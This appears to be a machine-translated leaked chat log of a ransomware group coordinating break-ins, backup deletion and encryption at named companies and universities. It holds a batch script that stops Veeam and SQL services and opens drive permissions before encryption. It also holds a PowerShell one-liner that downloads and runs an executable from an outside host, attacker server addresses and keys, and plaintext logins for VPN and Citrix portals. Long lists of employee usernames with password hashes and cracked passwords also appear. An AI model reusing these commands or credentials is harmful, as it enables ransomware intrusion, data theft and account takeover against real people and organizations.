no 445 anywhere, only backups are visible on the nasa for nowHow is the work progressing?hi all hello thereafter, we are trying to remove the backups from the mega in the water, let it pour in the mega in the water, and do not confuse which one or what and the mega we leave it in the water in the slipIt appears that piripezd sometimes in the mouth cleaner even missthink only water then okada it missklik in the water now .you misinform me in rt all yes only water and rt and water while loading? no in rt all unloaded? would not want to leave the mega there it's all very interesting, but can we wrap it up already today?
I'm sleepy.
Everything's ready for the rtp.
i've got everything on the water except for the backups, tomorrow i'll have time to deal with it by 3Too subtle bdsm whisper it's the windup's business to sufferSo let it stay like that)Good for you too generous rating "Fragile "It's not fragile, it's just fucked up. It's better for everything but dota and pbna.
Fuck the windup.
```
of course fuck it, you can see how fragile it is) maybe. i don't even know why it's allowed for rdp
maybe it's because it's a "remote" service if you could do that there'd be a lot of conflicts Fuck the windup... but it's the windup... i know it's stupid...
it's vindaKuryu i understand that you're googling now, well when you finish googling please tell me what you found in the repository of knowledge it's a fixed protocol, not a service that you can deploy anywhere else all the rest is forward on nix - you could on vinda) seriously?)
you will ALWAYS have reception on the smb on 2 ports
read the documentation)
```
Googling))) not changing the port is portfwd It is possible to configure port mapping on the nasa
Everything can be changed
```
read the documentation)) it's a medal the last two messages - on bash.org unequivocally and no matter what it will not work everything can be changed I'm not even fucking sure that it changes in the wind in general) ok not change the port in AD
and then guess
which one is smb
which is the rdp
how will it work without smb? for example diskshare...psezek? but what's that to us dastmik also does not work[ ](https://mediaeveryone.com/channel/general?msg=3xDH4WufyJHjSg3X6) now the cards will point the way no idea, it's too complicated this time which rdb which of them smb to guess potomotnite 1 to 65535)mb port have changed[ ](https://mediaeveryone.com/channel/general?msg=Jy7qoefNuXnWSgxhx) thoughts on the subject? these remained+tok with the backups listings left in the water
can not remove because there is no rdp or smb ports loaded on the megutak well what do you have? in half an hour, guys who have something important left in the tpsh take it away ponyaly he will skip at the next attempt to network location as soon as the file location process starts on it hangs the flag immediately no
it does not conflict with each other? if from two servers, conditionally, will come to 1 arm where 1 has already started the process
but if it's everywhere off then why not? it will work if you turn off the Aver by itself it's possible to do so
for example from a SYSVOL balloon which is available by default to all machines domainedr can it kill? and maybe add to the batter, that at the end it would download the locker from some balloon and run? it does not conflict with each other? if two servers, so to speak, will come to 1 arm where 1 has already started the process run it without arguments and the locker will start scanning the network for available balls as it finishes locking "in itself" on the machine as you can see it slows down services and kills peeps who can hold handls + shares disks
"C:\Windows\system32\net1 stop \"samss\" /y"
"C:\Windows\system32\net1 stop \""veeamcatalogsvc\"" /y"
"C:\Windows\system32\net1 stop \""veeamcloudsvc\"" /y"
"C:\Windows\system32\net1 stop \""veeamdeploysvc\"" /y"
"C:\Windows\System32\net.exe\" stop \""samss\""/y"
"C:\Windows\System32\net.exe\" stop \""veeamcatalogsvc\"" /y"
"C:\Windows\System32\net.exe\" stop \""veeamcloudsvc\"" /y"
"C:\Windows\System32\net.exe\" stop \""veeamdeploysvc\"" /y"
"C:\Windows\System32\taskkill.exe\" /IM sqlbrowser.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM sqlceip.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM sqlservr.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM sqlwriter.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.agent.configurationservice.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.brokerservice.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.catalogdataservice.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.cloudservice.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.externalinfrastructure.dbprovider.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.manager.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.mountservice.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.service.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.uiserver.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.wmiserver.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeamdeploymentsvc.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeamfilesysvsssvc.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.guest.interaction.proxy.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeamnfssvc.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeamtransportsvc.exe /F"
"C:\Windows\system32\taskmgr.exe\"" /4"
"C:\Windows\system32\wbem\wmiprvse.exe -Embedding"
"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding"
"icacls \""C:\*\" /grant Everyone:F /T /C /Q"
"icacls \""D:\*\"" /grant Everyone:F /T /C /Q"
``This is an example of "prelok" batnick let's hope they won't eat it)) he has some kind of toolkit there or is it shellconcat too? in this network semantics is vicious while his loads work yeah, does the new coba come?
172.241.27.18
https://agesk.com
----------------------------------------------------------------------------------------
209.222.97.8:62460
TnRLaHoRRRwyezbn6ybP1ed1xRlhtnAQAM5o
#wilsonart-com:space_invader:space_invader:space_invader:space_invader:space_invader:space_invader:space_invader,#wilsonart-com:space_invader:space_invader:space_invader,#wilsonart-com:space_invader:space_invader:space_invader:space_invader:space #wilsonart-com:space_invader:space_invader:space #wilsonart-com:space_invader
#ballymoregroup-com
and something else I'm not involved in what's in the works today? I'll keep you posted on how things go from here, most servers are off, those that aren't are encrypted...have you checked the old network? hi)everybody, the old network is checked, but the rest is not[ ](https://mediaeveryone.com/channel/general?msg=egNgG9m4nGZggDsk2) no[ ](https://mediaeveryone.com/channel/general?msg=5hJjTn62neuBcoHf4) intrigued... And an hour has passed alreadyNo fly sessions did not help in an hour, all together we will get together on a small bering about the next week but in general they may not need soonernae anything)on zakrepov .... a zakrepov? + updated the files in tours, there detekt 4/23 on the dynamics instead of 9/23started these two ways ``
regsvr32 file.dll
rundll32 file.dll, StartW
``Disassemble I have all x64? ok, 4 then, it's better to have in reserve in tv as well
but just in case it's your only chance to clean the load 2 shellcoats that's it? i'll give you a couple more vpn's in work 2 pcs? all? send me a shellcoat i'll give it as an archive but i can clean it by hand at the moment by tulsam, dudes come by, but computers are not domain so it is hard to get there. i threw hashes tl2, maybe when it will unload...on sccy silence? i with the tv and user7 helps
the sccy is silent? 1 with tv and 1 with sccb? the same as yesterday) who's working with what today?
Extracting DPAPI Backup Keys with Domain Admin

https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++
``hi:space_invader::man_raising_hand:hello everybody it does not work citrix? no session as I understand no? parsing is working with the network via kmd, trying to raise rights without backconnect parsing is what? 1) dns tunneling
2) parsing WITHOUT EXTERNAL CONNECTION This is where the fun part starts.
we have two options really do not (no))) now look whether there is no external at all? tried powershell command generated input - seems to run but no session they are swearing at something, and what I did not have time to understandһttp://gist.githubcom/ethack/110f7f46272447828352768e6cd1c4cb through downloadstring and iche easier to do so, or rather not from a file but from a buffer possible to make an intermediate input script which from a file will emulate keystrokes, did it when they had to without a buffer large lines to type manually = )))) there clipboard does not work - any idea how? one of "chips" Citrix
if the kmd is already running - it won't close even if the citrix session dieshttp://cobaltstrike.com/help-externalc2 then the session will stay alive and if the kmd opens the host is back:confused:Hello!:metal:hello everybody)I think something like `powershellexe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://drive.google.com/uc?export=download&id=0B1NUTMCAOKBTdVQzTXlUNHBmZUU',"$env:APPDATA\ps.exe");Start-Process ("$env:APPDATA\ps.exe")
NOT via rdp
```
I wrote above startup of usual applications is logged simply, those which have already been marked as "current"
plus if a user comes in at the time of the work and sees the new ones on his dashboard... Well, in general there is no need)) and use those that are available, they "can" go up in the allowed applications should not make changes Passage to the webserver from the frontend, if it will be much later, it is a very vast topic and requires a fairly deep understanding of web technologies, well, at least when we are not talking about vulnerabilities wordpress blogs = )This "basic" checklist for citrix escapehttps://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/цитрикс is a thin client, but still it is a webvpn that is almost always tied up
https://sf.primeinc.com/vpn/index.html
ziegd
SuperbowlChamps20
```

call kmd = )
NOT through rdpna collective intelligence))so, a practical problempohyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy, now we'll do it...we don't haveGood morning. There are live sessions for further practice? hiGood morning! Monday at what time? here. see different ips) 209.222.97.50:10201 here is mine and I do not have another.206....24[ ](https://mediaeveryone.com/channel/general?msg=9G9GPaySX5fNYHYD4) about itThat about which dedic? you about which ips) I have this dedic long ago, you gave it and asked after setting you to write that you took a picture and can roll it back. Look even there is a softs kotryy you have not put) I have not configured access to your addy, I gave you ` own` I gave him to work with evo with a already configured vpnomvzaimno no, you what confuse that squeeze me) is myparu min@user3 you took? not me, mine `209.222.97.50:10101` who took my addy after # evo-com?and i don't get it give you a fresh build tulchyna then 20 mnahahaha second you don't have to go shashitvo first these copypastes devil's toy go all the buttons i need to write one option)can combine )@all i'm preparing you a guide to speed up work, you want to poke buttons in the tulch or copy from the guide?okily let someone tell you a few posts above on updating settings for someone who came to life)we still have 10 hours too early)ready to go to sleep now + we will have a general discussion on process optimization next week will be very busy, so I recommend you get some sleep this weekend if you need more than one different is a separate special order1domain one, or will there be different?++understood? now everywhere use domain in https hosts (stager) ip domain you used to specify the domain in httpshosts in the settings koba little change all in the attention I have an announcement call everyone in the chatty cute sweetdalay i still in koba @user9 sit time why drag it out to replace there is nothing in google that sessions do not fly so if nothing in google, then what do you say?why are you silent? I think nothing in google, but it does not fly there@user8 what's wrong with the cob? and herehttp://github.com/asciimoo/exrexhttps://www.passcape.com/password_recovery_maskхешкат can do that? https://github.com/hashcat/maskprocessorгугл no need to remind a shithead. If you mean ping, then it's okay.
if not - remind me) so check the method known@tl1
try to pass any session in agesk.com
i got nothing from last login, not from coba @user9
check how dirty is 1? i'm also in CRISPREGIONAL.ORG@user9? someone is missing than from putty to get the crits for #1-done-crispregional-org
in passing at #0-dead-waterway-com checked to see if they're up or not. The situation since yesterday hasn't changeddrawing adinfo from trusts in #corp-televisa-com-mx so who's doing what? Fuck, everyone had it, but it fell off at different intervals[ ](https://mediaeveryone.com/channel/general?msg=BW3aGy9eQmo2mnQxF) were only in one cob?[ ](https://mediaeveryone.com/channel/general?msg=BW3aGy9eQmo2mnQxF) I don't see it fixing[ ](https://mediaeveryone.com/channel/general?msg=uM3C6eJm8Go9riDeu) yes, but while I was helping the other one, it fell off.
you fixed it yourself and that's it[ ](https://mediaeveryone.com/channel/general?msg=uM3C6eJm8Go9riDeu) yes, user4 with it
2 no answer urgently plz, is it up and running? hello, some of the servers were restored in yesterday's
see what's up? hello everyone
https://ftuapps.dev/proxifier-standard-edition-3-42-x64-x86-keygen-portable/
``from the machines where you can not go dump the craps through the cme how are you doing? good morning, thank you all goodnight)https://hackware.ru/?p=11287LM:NTLMт e in this format takes hash yes?good morninGood morninGood morninGood +++ accepted If i will not be there by this time and you have a deadlock you can go home by 1 o'clock then i think how to do it there is an option to do something else with relayeny da, there are about 6 dk and all patched eezerologon also past? try all kinds of web services scanners search da, already tried a hundred times on other pc's tried?there is a ghost of hope for sbmgost and ethernal? there is a ghost of hope for shulcitra alsoexcch can't be seen noasharfineedr gave nothing? nothing at all? well, there is another thing for 20k pc 0 services? more specifically nothing can be seen citra, vcenter, shul etc. there is almost 0 (refer to services within the network) well in general we have a deadlock now in our network, maybe some other vectors you can suggest?tomorrow by 5 what a delight))) to 2 work with what we have today without sessions) to 10?)))) by how many sessions will be available? only 2 will be available, the other creeds are not valid (so do not turn off I ran across some that were available, they need to connect to turn off the winDFto yesterday have not finished?
dig into snpartners.com. what's the task?
108.62.118.209
https://simvp.com
-
104.194.11.10:50058
ZdAscYQ31DMSJ9EsJ4DcntCSrubZt9gRVyX
Yes and yes@user9 you t eotclick in sessions no? is this a new one? Tomorrow everyone will show extra sessions on this today so that[ ](https://mediaeveryone.com/channel/general?msg=cp3jcby6d8QQMTgur) Group is not, so I'm writing here
I ran out of brute force, of course nothing was brute force
scanned more on skul, ftp, webs
tomorrow the plan is to let ms17-010, but no credits, so I think the result will be the same as with smbot write to the group at what is over remember to send kerbs @tl2I took kerbsdosorted servers 63sh thought will ever come in a thousand restart, but no, the system failed and now sometimes loads less:zany_face:I do not know their domain, while I am not online? meaning from the dedicam under wpn `unf.edu `?
there is a hash of LA and a bunch of computers where it fits, but it's all Windows 10 Educational
I tried that hash on the servers and it didn't fit.
All my sessions are dead and the domain is in the black.
trying to enter the coboo, which broke yesterday from the tulchain's addfynd, hangs on about 90%, but every restart loads ~20 bytes more :thumbsup:[ ](https://mediaeveryone.com/channel/general?msg=gWidZnXBAk4A935Ga) on my
got the VPN up - scanned the ip scanner from my ip/16
scanned the ports of the PCs I found, there are some with 445
let smb_login with the codes that are and . in the domain, in case there will be so what do you have at the end of the day? from 1:00am to 10:00pm to what time? please let me know how you are doing on the tasks give me an ip in a private message I can reload the dedic?put vnts and connect so)[ ](https://mediaeveryone.com/channel/general?msg=gWidZnXBAk4A935Ga) here is the link to the vpn, but after starting the vpn, the dedicle, apparently, goes beyond the vpn (when connected to the vpn just hangs RDP, after reconnecting RDP - vpn off. After turning on the same goes for a VPN and hangs) will save a lot of time for those who do not have anything except LA Credits on a bunch of machines
https://github.com/Hackndo/lsassy
use this one
take the time to set it up correctly once.
so you have a set VPS on hand for this fuckin' thing right now
https://vpn.floridapoly.edu austinwise0712 MechEng030796!

```
@user9 substituecan't you do anything fun in the settings? Is there any way to tunnel if there's no .cr download option?
I tried the citrix.tmwcloud.com link and creeds, but the connection just hangs in the download.
In citrix itself, all icons are disabled, everything is not available.
https://citrix.tmwcloud.com/gti/auth/login.aspx mritchie Welcome01

```
@user9 replacementwhat can you do with it?)[ ](https://mediaeveryone.com/channel/general?msg=oL6a59ZRrXQpcJ8sv) and here it's not clear, it's some kind of crm
didn't find a console or something to send commands or a file to cram
Terminal Door Control - toggle switches open/close doors, vending and so on, write the status to the group
https://www.emorycard.emory.edu/onecardwebadmin/operator/logon cwatson yourdoom23

```
@user9 no substitute, empty nothing at all in the citra? @tl1 can i have a substitute?
ipn does not come up and nothing can be taken out of the citra because there is nothing there.already createdhumboldt.edu external domain what? can i have a confu `AD.HUMBOLDT.EDU` output to confu then why is the output different? they are localgroup that not /domainlocalgroup /dom?[ ](https://mediaeveryone.com/channel/general?msg=qGXwKiGcGYSmbDoxQ) maximum strange design if you connect not through a browser it will hang[ ](https://mediaeveryone.com/channel/general?msg=Cm4AQuumDNbMoDprq) and it should ask the user to start the upa which I downloaded earlier@tl1 @tl2 What if I use net localgroup "administrators" /dom I get domain users with admin rules on the machine where I start it?[ ](https://mediaeveryone.com/channel/general?msg=cAmidLT3JooCsCNQE) a blank account, nothing in the zip
it's not always clean, but you have to know it or you can uncheck your settings and it will show you the path to the history
Get-PSReadLineOption
``````
History File Information. The default location for this file is $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt .
``How do you clean it up?`` Who else don't know if you can store command history on the system?
https://vlab.humboldt.edu/rdweb/webclient/ vl77 M1lksh@ke

```
@user7 replacementa what do you have?
https://apps.ufl.edu/citrix/xenappext/auth/login.aspx icebecky PeGjzXpnvx3Mjp$

```
@user9 replacementwrite status please work in your confurdn will be ready by night, so you will issue it tomorrow. today we are working under current conditionsThis is good newszbs + so that in case of what you can roll it back I will make you a snapshot of the state immediately as you pick up your personal, change the password from the account and send me in a personal message new password then configure your environment but the basic state soon - during the daymne 16)))there are 3 wine 10 and 3 wine 2016 ok! Glory to the great wars! you will soon be issued individual vindustadny granddisks by tasks in the confab immediately) I am close to a standstill
I had a story yesterday on /16 on 445 from his sabinet, but nothing found) but it's like Everyone has a task?okkakak you remove the hashes at once jump to a couple of servers in addition)naturally)and whether the account is active at all and so check the validity firstOk, kerb I saw - will dtsink doCHalf an hour will come and if there are problems will lookmne need to leave for half an hour now will be, so just say, keep working on yesterday's tasks, you also have 4 dedics now, cobs and everything else the same@user4 you there kerber frustrated) @tl2 to the conf conf conf skniulHi, not there yetAnybody here? All hello:space_invader:tomorrow by 2 today until 10```.
System Boot Time: 12/28/2020, 12:01:39 PM

``He doesn't turn off the car?
====== AntiVirus ======

  Engine : Spybot - Search and Destroy
  ProductEXE : C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
  ReportingEXE : C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe

  Engine : Security Manager AV Defender Antimalware
  ProductEXE : C:\Program Files\N-able Technologies\AVDefender\WscRemediation.exe
  ReportingEXE : C:\Program Files\N-able Technologies\AVDefender\EPProtectedService.exe

  Engine : Windows Defender
  ProductEXE : windowsdefender://
  ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe
``12:03 PMav what?[ ](https://mediaeveryone.com/channel/general?msg=poHHucH2R6fwbP7Ss) seems like it should''
  CurrentUser : WATERWAY\mharper
  Idletime : 01h:11m:03s:765ms (4263765 milliseconds)
``So isn't the session in keystrokes supposed to be empty? Isn't it supposed to print? On the contrary, the hartbit is 0 and the session is still dead, so I don't write keyloggercontext user in svchost[ ](https://mediaeveryone.com/channel/general?msg=mXPPGXmFrDTjn3jAw) and the keylogger isn't set to it, right?
```
https://store.vmware.com/,https://store.vmware.com/store/,10/7/2019 12:44:17 PM,13214943857640860,mharper@waterway.com,1Vanilla2
```
he also had this in his sharpshooter output
```
http://192.168.0.43/,http://192.168.0.43/,10/21/2019 11:08:36 AM,13216147716516941,,
```
it's nimble, i.e. walks, but no credits(
 
on the same computer found a password-protected file Passwords.xlsx, on the off chance I poked the administrator password, came up, nothing interesting
now trying to open two aacdb-shek@tl1 Checked all available servers/arms everywhere KB stands, now go to the armies check the files, mb that will be. interesting @user3otnick that you have on the results go to the guys (+ at all? no problem, tell the others that you can so time to waste) thank you okay?
bdfb6cd5e3fd0d06ddcb550a10dd935d Mollydog1!
04d5eff0ad5cfa74893376377799e6e4 Edith@2013
371464bd973caf912b2eb57d6e8b8c8d Soccerfun2!
bd626598054a653c5b29362e7ccf0fda @@rdv@r$
1160d864b8efdbf3a2a7789fb7dbf852 S$ophia91
07d4c3a9293355b60d47b8af140658b5 Babe8652
da1b9ecaaafa492621baec7db4e0768c Dexter56!
a6aee6e3cee15dcc6c1da0c0029c9d0e Cheers21
0a1737099297bce33028550c609d51fe Santacruz1
3ef41951b919a7a714f5ccd94d2785b9 Playmakr59
515105422901de09e5147150eae90fc1 Snoopdog6
2aa61789ef2ffea7dde6dd2a669d8b14 Poncho1953
d7a56add2083dbb16f2967ee4a43693c hawaii9
589b85762d8ab451401df29aa7fdc417 Winter2020
f0d246ee027ba7e2222d11f532e33396 RVlife1!
50131ca82ae8323af7bf0a33ce195f6b Ginny12345!
8174a4102f8e0c19ced57f48fbf854ef mima2015
9553947130d99b5305e7c6e2c55f19f6 Bassbass89!
8c07cda602b94dfcf44f1695910a39df Thankgod99*
98bde6ce745eee9db8730f46a1fa4c43 22Marcus22
df3cad6b33ff0a54309cc2c131b7e9fd Cotija207
27909a110b4e50b486d51702bd86857d Quality2!
e7be7281093d53dcfabd8eb3970d0393 R1f12l66$
a9aec143fc91ff315015840d0407c7bd Firstone55
65027469316266a14abe5e628cccfcd0 Molly71@
2b323b1cfec9165938df237613b381a2 Korbel011
f36fee819dad37f174b81b078b296e2e Vineyards15
baf8e023e871f3b5f79512a57c6a62e7 Year2021!
6189b54305abed05d16b60b48cf72ed7 maguey#5
a8588850ef9e29663757ec2382d8fc3b Jackie38
77a37eab2d43a85725f7c90fee594d59 Korbel58
39e1ce27741039350266829c0f7eb4e8 Lucy@2013
f48f52d28ea79b1d658ca5d66c5bff36 M@tt0420
e4a22d8e7bbec871b341c88c2e94cba2 Welcome123!
a1c70a25f68e27c1c0012bb0d58edd66 8barrett!
763ebebf2ba3134afe8f001617a36755 Outofhere!
ec3ccfd708b8aad44bde184a8cef8bcf Kaleb2008
3cd4601799b7516ccf31d5216ed6a5fa Doggies123
2857f0e40a794a646315b20612cabce6 Jaxson2020
ce38fef132030421c1f237301b208ac6 Mexico2021
2af0abe976a17fe926f45fbd26ef9b3b Hermida*14
271f5f4c31c1eccd00458e1884f8111a rich@ter35
c15c6cf00354b412ffb695036bb0da0f Ballplayer3
88da42440abb98e98baaf8d71f6788f0 @dv@n+3l
263dccb097be7270f29ad93249f025b3 Nopass20!
1aef4a9d29b3918e068acf0c40a6d0e4 Frankie8835
b03e5d6101f4428fc15a4af13c2d1f67 Korbel!3
9f492d9fd317748b07d36eead23bd236 Autumn1!
0f9b7619fddf9e02d061d3c580b77820 Lovemy4kids
1ac39bdd695eb913a4f0b73d9159e53d ChangeM3@
ba03a114def8d5c913983436960e592c pass@word1
6be408f1e80386822f4b2052f1f84b4e P@ssw0rd3

´´So I'll let go then?´´ The first three have passed.´´
kirsten.matteri bdfb6cd5e3fd0d06ddcb550a10dd935d
mayria.parmeter 04d5eff0ad5cfa74893376377799e6e4
danielle.matsumura 371464bd973caf912b2eb57d6e8b8c8d

Jcomfort bd626598054a653c5b29362e7ccf0fda
cncsupport 728f33af6ae2a27678028814ab411554
Areoutt 1160d864b8efdbf3a2a7789fb7dbf852
Mhealy 07d4c3a9293355b60d47b8af140658b5
Mroche da1b9ecaaafa492621baec7db4e0768c
PAhvenainen e6242a3a5b39d06307c96f3b77f45f59
Rmarson 8d6d8b8edd61fe852558ed756a8991f3
Lrussell a6aee6e3cee15dcc6c1da0c0029c9d0e
Mindrebo 0a1737099297bce33028550c609d51fe
Bwalsh 3ef41951b919a7a714f5ccd94d2785b9
Gruhland 02b67f42c10f9ce871cd7b24ac0bdff7
Debbie d74378f8a658b50b8acbd4032490fabe
Chakola 515105422901de09e5147150eae90fc1
Serena 891612a4d50457d2c543bc37f0563e90
Dfaris 3fafb54aa5524a39f1298338f6464335
Shollander 2aa61789ef2ffea7dde6dd2a669d8b14
Candrade d7a56add2083dbb16f2967ee4a43693c
Kfaris 752084462e4136656173014ec09bd462
Lreynaga 589b85762d8ab451401df29aa7fdc417
Lcabitac f0d246ee027ba7e2222d11f532e33396
Sschlabach 50131ca82ae8323af7bf0a33ce195f6b
Ahealey 8174a4102f8e0c19ced57f48fbf854ef
Jbidia 4168560575faed5ed2547df2d5935a31
Drhodehamel d5c9925e3cc9d79772c079bccca7b41b
matthealey aaaa2ed2f1ae8dbd18bbd1eff3b90ce6
Aomiotek 9553947130d99b5305e7c6e2c55f19f6
jkrambs 201948eb76f41a6cd4ee48ce49702805
Dan ace98571b9d8b729bc3907c274fe5421
jeannine 8c07cda602b94dfcf44f1695910a39df
Dhaught 98bde6ce745eee9db8730f46a1fa4c43
Gary 8f356149e6b800293dbf993e2cfa0a8f
Jrobertson d96d7fa2b91611712a551cdd11464fb9
Tmazzola 959541859e8db46868cf0c28dc959339
Dsanchez df3cad6b33ff0a54309cc2c131b7e9fd
Ltorres 27909a110b4e50b486d51702bd86857d
Rvalencia e7be7281093d53dcfabd8eb3970d0393
lgiang a9aec143fc91ff315015840d0407c7bd
Jyoungberg 65027469316266a14abe5e628cccfcd0
Hsiniscalco b939fe7947d85a151fde29b100f3d073
Hcscalehouse1 6b3585ea1524578e252eb70e11b40362
hcscalehouse2 6b3585ea1524578e252eb70e11b40362
senturus 70032882faf3427cf9904be36750fee1
senturus2 70032882faf3427cf9904be36750fee1
Econtreras 1973d3c3267dbfe1729e58c3858262fc
llarrabure 2b323b1cfec9165938df237613b381a2
acrolon e0550f6bb9fa17fd37815f201639ff1a
sdostert cb0d3dc3f81b8963a903cba7ebe02eda
Cmilton e8200daf6b049f0195e235a374e8f62c
Khewson f36fee819dad37f174b81b078b296e2e
Cnelson baf8e023e871f3b5f79512a57c6a62e7
Ppicazo 6189b54305abed05d16b60b48cf72ed7
twood a8588850ef9e29663757ec2382d8fc3b
slopez 77a37eab2d43a85725f7c90fee594d59
kdion 39e1ce27741039350266829c0f7eb4e8
Sloopstra 0ba96b15abe438a3f7e79ffe53de3c96
Svaladez 1e7118c5a0c432e782b748686c178fcd
elamb 3238e1417db8896aa9314d33833366c0
mignacio f48f52d28ea79b1d658ca5d66c5bff36
Bjackson 07502ae807bce83b122f8c1bb3422b54
mmensinger 71738c116989d08d9ef06732a8abad93
will.whiteside e4a22d8e7bbec871b341c88c2e94cba2
jennifer.bond a1c70a25f68e27c1c0012bb0d58edd66
denovo 9953126c4fda15c961b170ec582f64fb
chelsea.symmonds 763ebebf2ba3134afe8f001617a36755
luciente.villanueva ec3ccfd708b8aad44bde184a8cef8bcf
jordan.fanucchi 3cd4601799b7516ccf31d5216ed6a5fa
dan.murphy ab433395e941fc7ede1a74b69537435a
edward.silva 2857f0e40a794a646315b20612cabce6
exocet f07ead77a7ffd23bb963ba68815c7c07
kerri.jensen 2144c88c66e286b224c51df66dffcd0f
aaron.debeers ce38fef132030421c1f237301b208ac6
melina.rivera 2af0abe976a17fe926f45fbd26ef9b3b
caitlyn.moore e80b6e82c8c7136b3a856b3ef0f7a529
susan.hazy 812ce3386fcf3069766863c9560cd9d5
barry.levine 271f5f4c31c1eccd00458e1884f8111a
brian.mcclusky c15c6cf00354b412ffb695036bb0da0f
tom.poland 88da42440abb98e98baaf8d71f6788f0
casey.howard 8d09aec6edff573fa9bafa8c301f7d55
cheri.canada 263dccb097be7270f29ad93249f025b3
smokey.chaiyavong 1aef4a9d29b3918e068acf0c40a6d0e4
Courtney.Boosinger b03e5d6101f4428fc15a4af13c2d1f67
davey.santamaria d43e29494f8a512628556209325910af
amanda.smith 9f492d9fd317748b07d36eead23bd236
kristina.karan 0f9b7619fddf9e02d061d3c580b77820
denovoms be2db0a50a166e29553ed4327fbfed87
perry.reyes 1ac39bdd695eb913a4f0b73d9159e53d
chris.pixton ba03a114def8d5c913983436960e592c
shirley.price e862901df2517d9e9b3edac2225eda71
Libby.Fifer 6be408f1e80386822f4b2052f1f84b4e
robert.lacy a22ddddb0061bb5749884050d9475a49
lookingpoint a65c6ee963098bd3c5d5c623315efd4f
alexandra.ogorman 612410304a2ed887f6bc4109ba2f3541
Siobhan.Johnson f156bd3e058922a64b0257a7ee93c6f4
schedule ca2b3bf6af89151f2c40299fe279307c
``I'll send you a list of all the users and hashes there is an option to check the list of hashes)))) how to 1? I check the hashes of dudes from the group "vpn users" and what are you doing? no more give you everything+++ right? we have @user3 with #evo-com
@user8 with #1-done-korbel-com
@user4 @user7 with #waterway-comwhich one of them should have admin rights therefind the mail server - try the acctsDa clarification of some circumstances, just lack of data on the network itselfa what are these changes related to?as you go along, I think you'll figure it out, I think it's `/ecp` what is it exchange admin sektepoka there is an admin account on this EAC which provides mailboxes unloading find a server and look at it as a backups it is additional url on the server and like it `/ecp` what is it exchange admin sektepoka only 1 option of developmentkak what algorithm of actions after finding the servak itself?yes i think how to formulate the question on this point@user7 and @user8 tell me how to do the 3 point) yes, you)[ ](https://mediaeveryone.com/channel/general?msg=wcGT7Kum4gkjpBfCj) and yet) there is a question on these points i will not answer any more@all look here and write that you saw the message) we backups? 3 the point is clear? how do you download them later within the limits of gbling is clear, but backups are heavy. do we download? so there are no questions later [ ](https://mediaeveryone.com/channel/general?msg=dd53m3dEGGvG3cL69) @all all saw?[ ](https://mediaeveryone.com/channel/general?msg=XFXSWgCDeHQPLFrGX) it's about what?+ additional tasks nimbul like nimbul did not come, there's nothing moved? in the confines?[ ](https://mediaeveryone.com/channel/general?msg=YCFp4f789HRuFcdwx) ok, I would have that archive - came you under @user9 logged in? you seem to be in the confineshelp with waterwayappendix is closed / shut down. I reinstalled it, so far it works, what's wrong with it?
f2bad4ac1e1a8562a7275c93d73bddeb 1234qwerASDF!@#$
29742bb43819d7ac0f12e0abec4ae5ce W3lcome?
29742bb43819d7ac0f12e0abec4ae5ce W3lcome?
06d681b7146acf1131ad37740fc9d902 #Ch3ckm30ut#
393f7aa28c905690ffe626d41a814343 agpmadmin
f2bad4ac1e1a8562a7275c93d73bddeb 1234qwerASDF!@#$
bd626598054a653c5b29362e7ccf0fda @@rdv@r$
36c873c206d2d7561f356fdc9c6c7298 switchscan
2839726ca10411244ad1fda1149a335c fkb1882

I'll give you the hashes above, you can check[ ](https://mediaeveryone.com/channel/general?msg=g63wScBdhr2cDqgdz) yes, YES long time ago should have changed, right?[ ](https://mediaeveryone.com/channel/general?msg=GFSYB3Aimw3z2vMas) and stop ... YES these on kmd5 passed
ben.mandeville f2bad4ac1e1a8562a7275c93d73bddeb
daniel.harvey 29742bb43819d7ac0f12e0abec4ae5ce
daniel.harvey_adm 29742bb43819d7ac0f12e0abec4ae5ce
Honcho 06d681b7146acf1131ad37740fc9d902
agpm_admin 393f7aa28c905690ffe626d41a814343
Ben.mandeville_adm f2bad4ac1e1a8562a7275c93d73bddeb
Jcomfort bd626598054a653c5b29362e7ccf0fda
switchscan 36c873c206d2d7561f356fdc9c6c7298
SMSadmin 2839726ca10411244ad1fda1149a335c
``I think there's about domain authorization there.``Are you trying to admin? They changed their passwords a long time agohave a look for vpn / remote / offsite / partner groups
similarwhen our process is complemented by the following actions:
1) remove backups listings up to 7 levels of nesting
2) whine file listings or table structures
3) Backup of mail server
